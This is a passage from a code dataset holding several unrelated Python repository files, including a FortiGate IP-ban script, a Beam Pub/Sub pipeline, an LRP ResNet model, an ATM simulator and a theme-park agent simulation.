token\n headers = {\n \"Authorization\": \"Bearer \" + firewall_token\n }\n #url\n url = f\"https://{firewall_name}/api/v2/monitor/user/banned/add_users/?vdom={firewall_vdom}\"\n\n #payload for update, if new path to file\n payload = {'ip_addresses': ban_list,\"expiry\": ban_timer_sec}\n\n #connect and get the respondcode\n response = requests.post(url, headers=headers, json=payload, verify=False )\n\n #print all ban ip to file\n print_to_file_banip_list(ban_list)\n\n arr = np.array(ban_list)\n print(f'ban ip list count: {arr.size}')\n time.sleep(5) # Vänta 20 sekunder innan nästa anrop.\n \n #print all ips from the Quarantine Monitor\n get_qurantine(FIREWALLSTOKEN)\n \n\n else:\n if response.status_code == 403:\n print(\"some authentication missmatch for apia token, HTTP Code: \", response.status_code)\n elif response.status_code == 405:\n print(\"Method Not Allowed response status code indicates that the server knows the request method, HTTP Code: \", response.status_code)\n else:\n print(\"Some Error, HTTP Code: \", response.status_code)\n\n\n\n# Stäng","repo_name":"khol/fortigate_sessions_list","sub_path":"fortigate_get_sessions_tabel_banip.py","file_name":"fortigate_get_sessions_tabel_banip.py","file_ext":"py","file_size_in_byte":5439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"22167279830","text":"import os\nimport pickle as pk\nimport time\nfrom collections import OrderedDict\n\nfrom torch.utils.tensorboard import SummaryWriter\n\n\nclass CLossLog(object):\n def __init__(self, paths, last_epoch):\n self.logs_path = paths.logs\n self.last_epoch = last_epoch\n self.meta_path = os.path.join(paths.nets, 'meta.pkl')\n self.writer = SummaryWriter(self.logs_path)\n self.meta_model = self.load()\n self.start_time = time.time()\n\n def add_value(self, epoch, name, val, new_epoch=False):\n if epoch not in self.meta_model.keys():\n self.meta_model[epoch] = dict()\n param_key = name.replace('/', '_')\n timestamp = time.time() - self.start_time\n 
self.meta_model[epoch].update({param_key: {'time': timestamp, 'val': val}})\n self.writer.add_scalar(param_key, val, epoch, walltime=None)\n self.writer.add_scalar(f'{param_key}_time', val, timestamp, walltime=None)\n self.writer.flush()\n\n def add_image(self, epoch, name, img):\n self.writer.add_image(name, img, global_step=epoch)\n self.writer.flush()\n\n def dump(self):\n with open(self.meta_path, \"wb\") as f:\n pk.dump(self.meta_model, f)\n\n def load(self):\n if self.last_epoch == -1:\n meta_model = OrderedDict()\n else:\n meta_model = self.get_meta()\n for epoch, dc in meta_model.items():\n for param_key, param_val in dc.items():\n self.writer.add_scalar(epoch, f'{param_key}_time', param_val['time'], walltime=None)\n self.writer.add_scalar(epoch, f'{param_key}', param_val['val'], walltime=None)\n self.writer.flush()\n return meta_model\n\n def get_meta(self):\n meta_model = pk.load(open(self.meta_path, \"rb\"))\n return meta_model\n","repo_name":"00itamarts00/FacialLandmarkDetectionDETR","sub_path":"common/losslog.py","file_name":"losslog.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40574527424","text":"import apache_beam as beam\nimport argparse\nimport json\nimport time\nimport traceback\nfrom apache_beam.io import ReadFromPubSub, WriteToPubSub\nfrom apache_beam.options.pipeline_options import PipelineOptions, SetupOptions, StandardOptions\nfrom apache_beam.transforms import window\nfrom google.cloud import logging\n\n\nLOG_NAME = \"horror_movie_dataset\"\n\ndef log_error(log, err_message):\n log.log_struct(\n {\n \"message\": err_message,\n \"error\": traceback.format_exc()\n },\n severity=\"ERROR\"\n )\n\n\nclass countDoFn(beam.DoFn):\n def process(self, element):\n try:\n return [('film_count', 1)] \n except:\n logging_client = logging.Client()\n logger = logging_client.logger(LOG_NAME)\n log_error(logger, \"Error occurred while counting number of Pub/Sub messages received in a window\")\n raise \n\n\ndef run(argv=None, save_main_session=True):\n logging_client = logging.Client()\n logger = logging_client.logger(LOG_NAME)\n\n try:\n # Code for parsing command line arguments was copied from https://github.com/apache/beam/blob/master/sdks/python/apache_beam/examples/streaming_wordcount.py\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--output_topic',\n required=True,\n help='PubSub output topic should have the form of projects/<PROJECT>/topics/<TOPIC>')\n parser.add_argument(\n '--input_topic',\n required=True,\n help='PubSub input topic should have the form of projects/<PROJECT>/topics/<TOPIC>')\n known_args, pipeline_args = parser.parse_known_args(argv)\n pipeline_options = PipelineOptions(pipeline_args)\n pipeline_options.view_as(SetupOptions).save_main_session = save_main_session\n pipeline_options.view_as(StandardOptions).streaming = True\n except:\n log_error(logger, \"Error occurred while parsing command line arguments\")\n raise\n\n logger.log_text(\"Commencing stream of horror movie data from one Pub/Sub topic to another Pub/Sub topic\", severity=\"INFO\")\n\n with beam.Pipeline(options=pipeline_options) as p:\n try:\n messages = (p | 'SubscribeToTopic' >> ReadFromPubSub(topic=known_args.input_topic).with_output_types(bytes))\n except:\n log_error(logger, \"Error occurred while reading pipeline input from Pub/Sub topic\")\n raise\n\n try:\n output = (\n messages\n | 'DecodeInput' >> beam.Map(lambda x: x.decode('utf-8'))\n | 'CountMovies' >> beam.ParDo(countDoFn())\n | 
'CreateWindows' >> beam.WindowInto(window.FixedWindows(15, 0))\n | 'GroupByKey' >> beam.GroupByKey()\n | 'TotalMovies' >> beam.Map(lambda x: {x[0]: len(x[1]), 'timestamp': time.time()}) \n | 'MakeStrings' >> beam.Map(lambda x: json.dumps(x))\n | 'EncodeOutput' >> beam.Map(lambda x: x.encode('utf-8')).with_output_types(bytes)\n )\n except:\n log_error(logger, \"Error occurred while executing body of pipeline\")\n raise\n\n try:\n output | 'PublishToTopic' >> WriteToPubSub(known_args.output_topic)\n except:\n log_error(logger, \"Error occurred while writing pipeline output to Pub/Sub topic\")\n raise\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"kelseyleewerner/dataflow_beam_pipeline","sub_path":"stream_pipeline.py","file_name":"stream_pipeline.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32468137219","text":"\n# Equipe: Mauricio, Tiago, Cassio\n\nfrom biblioteca import Biblioteca\nfrom livro import Livro\n\nclass Locacao(Livro):\n def __init__(self, id_livro, titulo, autor, paginas, ano_publicacao, numero_exemplares, aluguel_diario,usuario, livro_locado, data_locacao, prazo_devolucao, data_devolucao, multa_atraso):\n super().__init__(id_livro, titulo, autor, paginas, ano_publicacao, numero_exemplares, aluguel_diario)\n self._pendentes = []\n self._usuario = usuario\n self._livro_locado = livro_locado\n self._data_locacao= data_locacao\n self._prazo_devolucao= prazo_devolucao\n self._data_devolucao = data_devolucao\n self._multa_atraso= multa_atraso\n \n\n\n if self.npendente(usuario):\n print(\"nao è possivel locar livro pois você esta com pendencias\")\n return 0\n if self.sobrando():\n print(\"nao è possivel locar livro pois nao tem mais exemplares\")\n return 0\n \n\n @property\n def usuario(self):\n return self._usuario\n\n def pendentes(self, usuario):\n self._pendentes.append(usuario)\n\n\n\n\n\n def npendente(self, usuario):\n if usuario in self._pendentes:\n return True\n else:\n return False\n\n def sobrando(self):\n if self._numero_exemplares == 0:\n return True\n else:\n return False\n\n\n\n def mostrar_detalhes(self):\n Biblioteca.mostrar_detalhes_livros(self._titulo, self._autor, self._ano_publicacao, self._aluguel_diario)","repo_name":"Mauricio41/maratona_ds","sub_path":"Biblioteca/locacao.py","file_name":"locacao.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"6528152495","text":"import torch\nimport torch.optim as optim\nfrom Unet_3D import UNet\nfrom Res_Unet_3D import Res_UNet\nfrom Vnet_3D import VNet\nfrom torch.utils.data import DataLoader\nfrom Brats_dataset import BratsDataset\nfrom Brats_sampler import BratsSampler\nfrom torchvision import transforms\nfrom transformations import random_flip, random_rotate90, random_intensity_scale, random_intensity_shift\nimport os\nimport pickle\nimport matplotlib.pyplot as plt\nfrom training import train_model\nfrom testing import test_model\nmove_to_cuda = True\n\ndef main():\n ##########DEFINE DATASET##########\n torch.manual_seed(0)\n len_dataset = 332 #data that is not test\n transform = transforms.Compose([random_flip(),\n random_rotate90(),\n random_intensity_scale(),\n random_intensity_shift()])\n dataset = BratsDataset(patch_size=96, len_dataset=len_dataset, transform=transform,\n patching='CENTER_TUMOR', is_test=False)\n dataset_sizes = [295,37] #about 80% train and 37 for test\n train_dataset, 
validation_dataset = torch.utils.data.random_split(dataset, dataset_sizes)\n test_dataset = BratsDataset(patch_size=96, len_dataset=37, transform = None,\n patching='RANDOM', is_test=True)\n \n ##########DEFINE DATALOADER##########\n batch_size = 1 #for space reasons\n train_dataloader = DataLoader(dataset = train_dataset,\n batch_size=batch_size, shuffle=False)\n validation_dataloader = DataLoader(dataset = validation_dataset,\n batch_size=batch_size, shuffle=False)\n test_dataloader = DataLoader(dataset = test_dataset,\n batch_size=batch_size, shuffle=False)\n validation_ratio = 40\n ###[1e-1, 1e-2, 1e-3, 1e-4, 1e-5, 1e-6, 1e-7, 1e-8, 1e-9, 1e-10 ,1e-11, 1e-12]:\n plt.clf()\n for lr in [1e-3]:\n ##########MODEL##########\n model = Res_UNet() \n for param in model.parameters():\n param.requires_grad = True\n # move the model to the GPU\n if move_to_cuda:\n model = model.to(\"cuda\")\n ##########TRAIN##########\n print(\"lr \", lr)\n w_decay = 1e-5\n optimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=w_decay)\n #class_weight = torch.cuda.FloatTensor([1,1,1,1]) #find the correct weights\n class_weight = torch.cuda.FloatTensor([0.1,0.35,0.2,0.35])\n nepochs = 1\n batch_size = 2\n train_losses, valid_losses, model = train_model(model, optimizer, train_dataloader,\n validation_dataloader, class_weight,\n nepochs, batch_size, validation_ratio,\n dataset_sizes)\n\n #######PATHS##########\n folder_path = '/home/mc/Brain_Tumor_Segmentation/model_stats/'\n model_path = 'FirstDebuggSave_ResUNet_lrDecrease_withClassWeights_nepochs'+str(nepochs)+'_batch'+str(batch_size)+'_lr'+ str(lr)\n\n\n ###################\n ###TRAINING DATA###\n ###################\n\n #######VISUALIZE TRAINING RESULTS##########\n print(\"train losses\", train_losses)\n print(\"validation losses\", valid_losses)\n plt.plot(train_losses, 'b', label = \"train_losses\")\n plt.plot(valid_losses, 'g', label = \"validation_losses\")\n plt.xlabel('epoch')\n plt.ylabel('loss')\n plt.legend()\n \n #######SAVE FIGS##########\n fig_path = folder_path + 'Training_Fig_' + model_path + '.png'\n plt.savefig(fig_path)\n plt.clf()\n \n ##########SAVE MODEL##########\n model_name = \"Model_\" + model_path +\".model\"\n model.eval()\n save_model_path = os.path.join(folder_path, model_name)\n torch.save(model.state_dict(), save_model_path)\n print(\"saved model to path\")\n\n ##########SAVE TRAIN LOSS LISTS##########\n train_loss_file_name = folder_path + 'TrainLosses_'+model_path+ \".pkl\"\n train_loss_file = open(train_loss_file_name,\"wb\")\n pickle.dump(train_losses,train_loss_file)\n train_loss_file.close()\n valid_loss_file_name = folder_path + 'ValidLosses_'+model_path+ \".pkl\"\n valid_loss_file = open(valid_loss_file_name,\"wb\")\n pickle.dump(valid_losses,valid_loss_file)\n valid_loss_file.close()\n\n ###################\n #######TEST########\n ###################\n test_dice_losses, test_hausdorff_losses, average_dice_loss, average_hausdorff_loss = test_model(model, test_dataloader, class_weight)\n \n #######VISUALIZE TEST##########\n print(\"test dice losses\", test_dice_losses)\n plt.plot(test_dice_losses, 'b', label = \"test_dice_losses\")\n plt.plot(test_hausdorff_losses, 'g', label = \"test_hausdorff_losses\")\n plt.xlabel('images')\n plt.ylabel('loss')\n plt.legend()\n\n #######SAVE TEST FIGS##########\n fig_path = folder_path + 'Testing_Fig_' + model_path + '.png'\n plt.savefig(fig_path)\n plt.clf()\n\n ########SAVE TEST LOSS LISTS##########\n test_dice_loss_file_name = folder_path + 'TestDiceLosses_'+model_path+ 
\".pkl\"\n test_dice_loss_file = open(test_dice_loss_file_name,\"wb\")\n pickle.dump(test_dice_losses,test_dice_loss_file)\n test_dice_loss_file.close()\n test_hausdorff_loss_file_name = folder_path + 'TestHausdorffLosses_'+model_path+ \".pkl\"\n test_hausdorff_loss_file = open(test_hausdorff_loss_file_name,\"wb\")\n pickle.dump(test_hausdorff_losses,test_hausdorff_loss_file)\n test_hausdorff_loss_file.close()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"maayanchechik/Brain_Tumor_Segmentation","sub_path":"train_test_save_model.py","file_name":"train_test_save_model.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17242963185","text":"\ntest = list(open('test.txt', 'r'))\ninput = list(open('input.txt', 'r'))\n\n\nmy_input = input\n\nfor i in my_input:\n letters = list(i)\n \n# print(letters)\n\ndef get_quad(string, index):\n \n return string[index:index+4]\n\ndef get_fourteen(string, index):\n \n return string[index:index+14]\n\ndef part_1(string):\n for i, v in enumerate(string):\n \n my_list = get_quad(string, i)\n \n if len(my_list) == len(set(my_list)):\n return (i + 4)\n break\n\ndef part_2(string):\n for i, v in enumerate(string):\n \n my_list = get_fourteen(string, i)\n \n if len(my_list) == len(set(my_list)):\n return (i + 14)\n break\n\nprint(f'Part 1: {part_1(letters)}')\nprint(f'Part 2: {part_2(letters)}')\n \n ","repo_name":"bendpannell/Advent-of-Code","sub_path":"2022/Day 6/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"7650902001","text":"#!python27\nimport os, random, time\n'''\nATM Simulator \nAuthor : S.Haseeb\nRegistered Account: 1111111111111111\nPasswd: 1234\n'''\nclass ATM:\n def __init__(self):\n self.AMOUNT = random.randint(500, 100000)\n self.USERS = {'1111111111111111':'1234'}\n def run(self):\n os.system('cls')\n while True:\n print (' ATM V1.0')\n print ('[ Welcome to Python Bank ]\\n')\n print (' Enter your Debit Card No.')\n self.NO = raw_input('<<< ')\n os.system('cls')\n if len(self.NO) == 16:\n break\n else:\n print ('[Error]:\\nATM number is 16 digits long.\\n') \n\n while True:\n os.system('cls')\n print (' Enter the 4 digit PIN')\n self.PIN = raw_input('<<< ')\n if len(self.PIN) == 4:\n break\n else:\n print ('[Error]:\\nPIN must be 4 digits long.\\n')\n\n if self.NO in self.USERS:\n if self.USERS[self.NO] == self.PIN:\n self.logged()\n \n def logged(self):\n os.system('cls')\n print ('Logged in as %s' %self.NO)\n print ('Current Balance: %s $\\n' %self.AMOUNT)\n print (' 1) Withdraw')\n print (' 2) Change PIN')\n print (' 3) Logout')\n selection = raw_input('<<< ')\n \n if selection == '1':\n os.system('cls')\n print (' Amount ($) :')\n cash = raw_input('<<< ')\n if int(cash) <= self.AMOUNT:\n self.AMOUNT -= int(cash)\n print ('Withdrawl Successful')\n elif int(cash) > self.AMOUNT:\n print ('We don\\'t give Loans.')\n\n time.sleep(2)\n os.system('cls')\n self.logged()\n \n if selection == '2':\n while True:\n print (' Enter New PIN:')\n pin = raw_input('<<< ')\n if len(pin) == 4:\n self.USERS[self.NO] = pin\n print ('PIN change successful.')\n break\n else:\n print ('[Error]:\\nPIN must be 4 digit long.\\n')\n time.sleep(2)\n time.sleep(2)\n os.system('cls')\n self.logged()\n \n if selection == '3':\n os.system('cls')\n print (' Logout Succesful ')\n time.sleep(2)\n self.run()\n \nif __name__ == 
'__main__':\n import platform\n if platform.system().lower() == 'windows':\n ATM().run()\n else:\n print('This program can only run on windows.')\n print('To run on other OS be brave enough to change')\n print('os.system(\\'cls\\')')\ntime.sleep(4)\n","repo_name":"yesIamHasi/Machine-Emulations","sub_path":"ATM-Emulator.py","file_name":"ATM-Emulator.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"39463514454","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom utils.lrp_general6 import *\n\nclass Cannotloadmodelweightserror(Exception):\n pass\n\nclass Modulenotfounderror(Exception):\n pass\n\nclass BasicBlock_kuangliu_c(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1):\n super(BasicBlock_kuangliu_c, self).__init__()\n self.conv1 = nn.Conv2d(\n in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,\n stride=1, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n self.elt = sum_stacked2()\n self.somerelu= nn.ReLU()\n\n def forward(self, x):\n out = self.somerelu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n #out += self.shortcut(x)\n out = self.elt( torch.stack([out, self.shortcut(x) ], dim=0))\n out = self.somerelu(out)\n return out\n\n\nclass Bottleneck_kuangliu_c(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1):\n super(Bottleneck_kuangliu_c, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,\n stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, self.expansion *\n planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion*planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n self.elt = sum_stacked2()\n self.somerelu= nn.ReLU()\n\n def forward(self, x):\n out = self.somerelu(self.bn1(self.conv1(x)))\n out = self.somerelu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n #out += self.shortcut(x)\n out = self.elt( torch.stack([out, self.shortcut(x) ], dim=0))\n out = self.somerelu(out)\n return out\n\n\nclass ResNet_kuangliu_c(nn.Module):\n def __init__(self, block, num_blocks, num_classes=10):\n super(ResNet_kuangliu_c, self).__init__()\n self.in_planes = 64\n\n self.conv1 = nn.Conv2d(3, 64, kernel_size=3,\n stride=1, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)\n self.linear = nn.Linear(512*block.expansion, num_classes)\n\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.somerelu= 
nn.ReLU()\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1]*(num_blocks-1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x):\n out = self.somerelu(self.bn1(self.conv1(x)))\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n\n #out = F.avg_pool2d(out, 4)\n #out = out.view(out.size(0), -1)\n out = self.avgpool(out)\n out = torch.flatten(out, 1)\n\n out = self.linear(out)\n return out\n\n def setbyname(self, name, value):\n\n def iteratset(obj, components, value):\n\n if not hasattr(obj, components[0]):\n return False\n elif len(components) == 1:\n setattr(obj, components[0], value)\n # print('found!!', components[0])\n # exit()\n return True\n else:\n nextobj = getattr(obj, components[0])\n return iteratset(nextobj, components[1:], value)\n\n components = name.split('.')\n success = iteratset(self, components, value)\n return success\n\n\n def copyfromresnet(self, net, lrp_params, lrp_layer2method):\n # assert not (isinstance(net, ResNet) or isinstance(net, ResNet_kuangliu_c))\n assert not isinstance(net, ResNet_kuangliu_c)\n\n # --copy linear\n # --copy conv2, while fusing bns\n # --reset bn\n\n # first conv, then bn,\n # means: when encounter bn, find the conv before -- implementation dependent\n\n updated_layers_names = []\n\n last_src_module_name = None\n last_src_module = None\n\n for src_module_name, src_module in net.named_modules():\n #print('at src_module_name', src_module_name)\n\n foundsth = False\n\n if isinstance(src_module, nn.Linear):\n # copy linear layers\n foundsth = True\n #print('is Linear')\n # m = oneparam_wrapper_class( copy.deepcopy(src_module) , linearlayer_eps_wrapper_fct(), parameter1 = linear_eps )\n wrapped = get_lrpwrapperformodule(copy.deepcopy(src_module),\n lrp_params, lrp_layer2method)\n if False == self.setbyname(src_module_name, wrapped):\n raise Modulenotfounderror(\n \"could not find module \" + src_module_name + \" in target net to copy\")\n updated_layers_names.append(src_module_name)\n # end of if\n\n if isinstance(src_module, nn.Conv2d):\n # store conv2d layers\n foundsth = True\n #print('is Conv2d')\n last_src_module_name = src_module_name\n last_src_module = src_module\n # end of if\n\n if isinstance(src_module, nn.BatchNorm2d):\n # conv-bn chain\n foundsth = True\n #print('is BatchNorm2d')\n\n if (True == lrp_params['use_zbeta']) and (\n last_src_module_name == 'conv1'):\n thisis_inputconv_andiwant_zbeta = True\n else:\n thisis_inputconv_andiwant_zbeta = False\n\n m = copy.deepcopy(last_src_module)\n m = bnafterconv_overwrite_intoconv(m, bn=src_module) # outcomment if you want no conv-bn fusion\n # wrap conv\n wrapped = get_lrpwrapperformodule(m, lrp_params,\n lrp_layer2method,\n thisis_inputconv_andiwant_zbeta=thisis_inputconv_andiwant_zbeta)\n\n if False == self.setbyname(last_src_module_name, wrapped):\n raise Modulenotfounderror(\n \"could not find module \" + nametofind + \" in target net to copy\")\n\n updated_layers_names.append(last_src_module_name)\n\n # wrap batchnorm\n wrapped = get_lrpwrapperformodule(resetbn(src_module), lrp_params, lrp_layer2method) # outcomment if you want no conv-bn fusion\n #wrapped = get_lrpwrapperformodule(src_module, lrp_params, lrp_layer2method) # outcomment if you want no conv-bn fusion\n if False == self.setbyname(src_module_name, wrapped):\n raise Modulenotfounderror(\n 
\"could not find module \" + src_module_name + \" in target net to copy\")\n updated_layers_names.append(src_module_name)\n # end of if\n\n # if False== foundsth:\n # print('!untreated layer')\n # print('\\n')\n\n # sum_stacked2 is present only in the targetclass, so must iterate here\n for target_module_name, target_module in self.named_modules():\n\n if isinstance(target_module,\n (nn.ReLU, nn.AdaptiveAvgPool2d, nn.MaxPool2d)):\n wrapped = get_lrpwrapperformodule(target_module, lrp_params,\n lrp_layer2method)\n\n if False == self.setbyname(target_module_name, wrapped):\n raise Modulenotfounderror(\n \"could not find module \" + src_module_name + \" in target net to copy\")\n updated_layers_names.append(target_module_name)\n\n if isinstance(target_module, sum_stacked2):\n\n wrapped = get_lrpwrapperformodule(target_module, lrp_params,\n lrp_layer2method)\n if False == self.setbyname(target_module_name, wrapped):\n raise Modulenotfounderror(\n \"could not find module \" + target_module_name + \" in target net , impossible!\")\n updated_layers_names.append(target_module_name)\n '''\n for target_module_name, target_module in self.named_modules():\n if target_module_name not in updated_layers_names:\n print('not updated:', target_module_name)\n '''\n\n\ndef ResNet18_kuangliu_c():\n return ResNet_kuangliu_c(BasicBlock_kuangliu_c, [2, 2, 2, 2])\n\ndef ResNet50_kuangliu_c():\n return ResNet_kuangliu_c(Bottleneck_kuangliu_c, [3, 4, 6, 3])\n","repo_name":"seulkiyeom/LRP_pruning","sub_path":"modules/resnet_kuangliu.py","file_name":"resnet_kuangliu.py","file_ext":"py","file_size_in_byte":10014,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"51"} +{"seq_id":"33757058748","text":"from mesa import Agent\nimport random\nimport math\ntry:\n from .route import Route\nexcept:\n from route import Route\nimport numpy as np\nimport math\n\n\n\nclass Customer(Agent):\n def __init__(self, unique_id, model, pos, strategy, weight, adaptive):\n super().__init__(unique_id, model)\n\n \"\"\"\n Args:\n id (int): a unique id to represent the agent\n model (Themepark): the model to link the agent to\n pos (tuple(int,int)): the position of the agent (x,y)\n strategy (str): indicates if agent uses a strategy or behaves randomly\n weight (float): float indicating the weight given to distance and queuetime\n adaptive (bool): if true, agent can switch strategies through run\n \"\"\"\n self.pos = pos\n self.model = model\n self.current_a = None\n self.strategy = strategy\n self.history = self.make_history()\n self.weight = weight\n if self.weight == \"Random_test_4\":\n self.strategy = \"Random_test_4\"\n self.adaptive = adaptive\n self.all_strategies = [x for x in self.model.strategies if x != 'Random_test_4']\n\n if self.strategy == 'Random' or self.strategy == \"Random_test_4\":\n self.destination = random.choice(self.model.positions)\n while self.destination is self.pos:\n self.destination = random.choice(self.model.positions)\n\n if self.strategy == 'Closest_by':\n self.destination = self.use_strategy().pos\n\n self.waitingtime = None\n self.waiting = False\n self.total_ever_waited = 0\n self.nmbr_attractions = 0\n self.waited_period = 0\n self.in_attraction = False\n self.in_attraction_list = []\n self.prediction_strategies = self.prediction_all_strategies()\n self.strategy_swap_hist = 0\n\n def make_history(self):\n \"\"\"\n This method provides the framework for the customer attraction history\n \"\"\"\n\n history = {}\n attractions = self.model.attractions\n for 
attraction in range(len(attractions)):\n history[attractions[attraction]] = 0\n\n return history\n\n def penalty(self, current_attraction):\n \"\"\"\n This method calculates and returns a penalty for attractions that were visited more\n often than other attractions.\n Args:\n current_attraction (Attraction): the attraction object the method calculates\n a penalty for.\n \"\"\"\n\n\n total_difference_sum = 0\n\n if current_attraction == 0:\n return 0\n\n # calculates the difference between how much the current attraction was visited\n # and how much all other attractions were visited\n for i in range(len(self.model.attractions.values())):\n attraction = self.model.attractions[i]\n\n difference = self.history[current_attraction] - self.history[attraction]\n\n # update the total difference\n total_difference_sum += difference\n\n if total_difference_sum < 0:\n total_difference_sum = 0\n\n # calculates penalty by multiplying with a deterministic value\n penalty = (total_difference_sum * self.model.penalty_per)/100\n\n return penalty\n\n def move(self):\n '''\n This method should get the neighbouring cells (Moore's neighbourhood),\n select one closest to the destination, and move the agent there.\n '''\n\n possible_steps = self.model.grid.get_neighborhood(\n self.pos,\n moore=True,\n radius=1,\n include_center=False\n )\n\n # chooses random step\n temp = random.choice(possible_steps)\n\n # Loop over every possible step to get fastest step\n for step in possible_steps:\n\n # check if step is closer to destination\n if (abs(step[0] - self.destination[0]) < abs(temp[0] - self.destination[0]) or\n abs(step[1] - self.destination[1]) < abs(temp[1] - self.destination[1])):\n temp = step\n\n new_position = temp\n\n if new_position == self.destination and self.waiting is False:\n self.model.grid.move_agent(self, new_position)\n\n # Get object of current attraction\n attractions = self.model.get_attractions()\n for attraction in attractions:\n if attraction.pos == new_position:\n current_a = attraction\n self.current_a = current_a\n\n self.set_waiting_time()\n self.waiting = True\n\n # Extra check to see if agent is at destination\n if self.check_move() is True:\n self.model.grid.move_agent(self, new_position)\n\n def check_move(self):\n \"\"\" Checks if a move can be done, given a new position.\"\"\"\n\n\n if self.waitingtime is not None:\n\n # set in ride to true false\n if self.current_a is not None:\n if self.waited_period == self.waitingtime - self.current_a.attraction_duration:\n self.in_attraction = True\n\n # CHANGE DIRECTION if waitingtime is met\n if self.waitingtime <= self.waited_period:\n\n # when attraction is left set self.attraction to false\n self.in_attraction = False\n\n # Update goals and attraction\n for attraction in self.model.get_attractions():\n if attraction.pos == self.pos:\n if attraction.N_current_cust > 0:\n attraction.N_current_cust -= 1\n self.model.attraction_history[attraction][self.model.totalTOTAL] -=1\n\n # if agent is next in line\n if self.waitingtime == self.waited_period:\n\n if self.current_a is not None:\n self.history[self.current_a] += 1\n\n # Only update when adaptive strategy is on\n if self.adaptive is True:\n if self.strategy != \"Random\":\n if self.strategy != \"Random_test_4\":\n self.update_strategy()\n\n # increment number of rides taken of attraction\n # if self.current_a is not None:\n self.current_a.rides_taken += 1\n\n # increment number of rides taken of customer\n self.nmbr_attractions += 1\n self.total_ever_waited += self.waited_period\n 
self.waited_period = 0\n\n                # set current attraction back to None when the customer leaves.\n                self.current_a = None\n\n                # decide on a new destination\n                if self.strategy == \"Closest_by\":\n                    self.destination = self.use_strategy().pos\n                elif self.strategy == 'Random' or self.strategy == \"Random_test_4\":\n                    self.destination = random.choice(self.model.positions)\n                    while self.destination == self.pos:\n                        self.destination = random.choice(self.model.positions)\n                self.waiting = False\n                self.waited_period = 0\n\n        if self.pos == self.destination:\n\n            # Check which attraction\n            attractions = self.model.get_attractions()\n            for attraction in attractions:\n                if attraction.pos == self.pos:\n                    self.current_a = attraction\n\n            # self.current_a. += 1\n            self.waited_period += 1\n\n        if self.waiting is False:\n            return True\n        return False\n\n    def set_waiting_time(self):\n        '''\n        This method calculates the waiting time of the customer based on the\n        number of customers in line, and the duration of the attraction\n        '''\n        attractions = self.model.get_attractions()\n        attraction = None\n        for i in attractions:\n            if self.pos == i.pos:\n                attraction = i\n                break\n\n        # update the waiting time of the attraction\n        attraction.N_current_cust += 1\n\n        self.model.attraction_history[attraction][self.model.totalTOTAL] += 1\n        attraction.calculate_waiting_time()\n\n        # add waiting time to agent\n        self.waitingtime = attraction.current_waitingtime\n\n    def get_walking_distances(self):\n        \"\"\"\n        Returns a dictionary of attraction-ids with their distances as values.\n        Distances are computed with the Pythagorean theorem.\n        \"\"\"\n        attractions = self.model.get_attractions()\n\n        distances = {}\n        for attraction in attractions:\n\n            # Pythagorean theorem\n            p1, p2 = self.pos, attraction.pos\n            dist = math.sqrt(((p1[0]-p2[0])**2)+((p1[1]-p2[1])**2))\n            distances[attraction.unique_id] = dist\n\n        # Sort by shortest distance\n        distances = dict(sorted(distances.items(), key=lambda item: item[1]))\n        return distances\n\n    def get_waiting_lines(self):\n        